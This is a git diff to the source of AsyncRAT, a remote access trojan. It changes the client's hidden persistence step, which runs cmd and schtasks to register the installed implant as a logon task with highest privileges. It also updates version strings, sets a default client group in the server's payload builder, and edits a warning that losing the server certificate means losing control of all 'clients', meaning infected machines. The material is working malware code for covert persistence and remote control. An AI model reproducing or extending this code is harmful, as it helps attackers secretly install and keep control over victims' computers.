diff --git a/AsyncRAT-C#/Client/Install/NormalStartup.cs b/AsyncRAT-C#/Client/Install/NormalStartup.cs index caf0ca5..5758469 100644 --- a/AsyncRAT-C#/Client/Install/NormalStartup.cs +++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs @@ -34,7 +34,7 @@ namespace Client.Install Process.Start(new ProcessStartInfo { FileName = "cmd", - Arguments = "/c schtasks /create /f /sc onlogon /ru system /rl highest /tn " + Path.GetFileNameWithoutExtension(currentProcess) + " /tr " + "'" + "\"" + installPath.FullName + "\"" + "' & exit", + Arguments = "/c schtasks /create /f /sc onlogon /rl highest /tn " + Path.GetFileNameWithoutExtension(currentProcess) + " /tr " + "'" + "\"" + installPath.FullName + "\"" + "' & exit", WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, }); diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs index cac0cb7..ee07b19 100644 --- a/AsyncRAT-C#/Client/Settings.cs +++ b/AsyncRAT-C#/Client/Settings.cs @@ -13,7 +13,7 @@ namespace Client #if DEBUG public static string Ports = "6606"; public static string Hosts = "127.0.0.1"; - public static string Version = "0.5.6D"; + public static string Version = "0.5.6E"; public static string Install = "false"; public static string InstallFolder = "AppData"; public static string InstallFile = "Test.exe"; diff --git a/AsyncRAT-C#/Server/Forms/FormBuilder.cs b/AsyncRAT-C#/Server/Forms/FormBuilder.cs index 03f10ab..871c294 100644 --- a/AsyncRAT-C#/Server/Forms/FormBuilder.cs +++ b/AsyncRAT-C#/Server/Forms/FormBuilder.cs @@ -185,6 +185,8 @@ namespace Server.Forms if (string.IsNullOrWhiteSpace(txtMutex.Text)) txtMutex.Text = getRandomCharacters(); + if (string.IsNullOrWhiteSpace(txtGroup.Text)) txtGroup.Text = "Default"; + if (chkPastebin.Checked && string.IsNullOrWhiteSpace(txtPastebin.Text)) return; ModuleDefMD asmDef = null; diff --git a/AsyncRAT-C#/Server/Forms/FormCertificate.cs b/AsyncRAT-C#/Server/Forms/FormCertificate.cs index b6feceb..055816a 100644 --- a/AsyncRAT-C#/Server/Forms/FormCertificate.cs +++ b/AsyncRAT-C#/Server/Forms/FormCertificate.cs @@ -56,9 +56,10 @@ namespace Server.Forms } Program.form1.listView1.BeginInvoke((MethodInvoker)(() => { - MessageBox.Show(this, @"[!]If you wish to upgrade to new version of AsyncRAT, You will need to copy 'ServerCertificate.p12'. + MessageBox.Show(this, @" +[!] If you wish to upgrade to new version of AsyncRAT, You will need to copy 'ServerCertificate.p12'. -[!]If you lose\delete 'ServerCertificate.p12' certificate you will NOT be able to control your clients, You will lose them all.", "Certificate", MessageBoxButtons.OK, MessageBoxIcon.Information); +[!] If you lose\delete 'ServerCertificate.p12' certificate you will NOT be able to control your clients, You will lose them all.", "Certificate", MessageBoxButtons.OK, MessageBoxIcon.Information); this.Close(); })); } diff --git a/AsyncRAT-C#/Server/Settings.cs b/AsyncRAT-C#/Server/Settings.cs index ce07417..bf944e3 100644 --- a/AsyncRAT-C#/Server/Settings.cs +++ b/AsyncRAT-C#/Server/Settings.cs @@ -19,7 +19,7 @@ namespace Server public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12"; public static X509Certificate2 ServerCertificate; - public static readonly string Version = "AsyncRAT 0.5.6D"; + public static readonly string Version = "AsyncRAT 0.5.6E"; public static object LockListviewClients = new object(); public static object LockListviewLogs = new object(); public static object LockListviewThumb = new object();